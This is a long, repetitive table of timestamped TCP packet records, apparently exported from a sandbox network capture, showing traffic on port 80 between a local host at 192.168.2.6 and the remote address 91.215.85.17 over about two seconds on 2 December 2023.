                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126749039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126760960 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126766920 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126791954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126840115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126852036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126863956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126874924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126877069 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126887083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126894951 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126899004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126909971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126920938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126923084 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126934052 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126955986 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.126970053 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127033949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127084970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127096891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127130032 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127140999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127154112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127176046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127177954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127198935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127213955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127217054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127249956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127250910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127264023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127306938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127322912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127398968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127434015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127437115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127485991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127497911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127509117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127520084 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127521038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127552032 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127557039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127580881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127593994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127618074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127629995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127655983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127681017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127692938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127703905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127722979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127737999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127747059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127769947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127809048 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127842903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127856970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127893925 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127939939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127953053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127964020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127974987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127986908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.127996922 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128001928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128005981 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128014088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128025055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128036022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128038883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128047943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128060102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128067017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128079891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128092051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128104925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128114939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128132105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128156900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128169060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128180027 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128191948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128213882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128222942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128247023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128262997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128276110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128312111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.128336906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.167987108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.221451998 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.221477985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.447119951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.464217901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.500091076 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.500128984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.726111889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745027065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745043039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745070934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745085001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745093107 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745096922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745145082 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745246887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745263100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745275021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745286942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745291948 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745299101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745310068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745320082 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745322943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745348930 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745363951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745366096 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745378017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745421886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745443106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745457888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745490074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745493889 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745502949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745539904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745553017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745565891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745603085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745615959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745628119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745667934 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745672941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745686054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745723963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745744944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745759010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745769978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745804071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745811939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745852947 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745882988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745893955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745913029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745928049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745929956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745959997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745975971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.745987892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746000051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746010065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746026993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746054888 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746140957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746153116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746164083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746179104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746190071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746216059 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746236086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746248007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746290922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746294975 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746303082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746315002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746340036 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746361017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746372938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746386051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746397972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746400118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746418953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746423960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746468067 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746479034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746490955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746505022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746529102 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746526003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746575117 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746697903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746710062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746720076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746731043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746740103 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746742010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746752977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746763945 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746764898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746776104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746787071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746798038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746799946 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746850967 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746937990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746951103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746962070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746973991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.746974945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747001886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747006893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747020006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747030020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747030973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747054100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747067928 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747158051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747169971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747174025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747183084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747195005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747205973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747222900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747263908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747276068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747292995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747304916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747344971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747344971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747464895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747565985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747579098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747589111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747601032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747612000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747615099 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747627020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747637033 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747641087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747641087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747648001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747658014 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747669935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747679949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747685909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747692108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747703075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747706890 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747714043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747725010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747728109 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747745991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747773886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747776985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747869968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747880936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747890949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747898102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747917891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747987032 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747989893 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.747999907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748011112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748020887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748033047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748051882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748090982 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748126984 CET804972091.215.85.17192.168.2.6
